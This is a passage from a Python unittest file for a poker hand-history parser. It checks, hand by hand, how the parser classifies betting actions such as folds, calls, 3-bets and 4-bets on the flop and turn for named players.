msg=file + ' ' + street + ' ' + player)
file = 'a6-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
def test_enum_b_raise_def(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('call 2bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('3bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('3bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call 2bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call 2bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('3bet', tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_raise_def(),
msg=file + ' ' + street + ' ' + player)
def test_raise_raise_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__bug4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Mimimimi77'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'b1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b8.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b9.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b10.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'b11.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.raise_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
def test_enum_raise_raise_def(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'b1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('4bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('call 3bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b8.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('call 3bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b9.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('4bet', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b10.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b11.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
class TestBVsMCbet(unittest.TestCase):
def test_b_vs_mcb_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
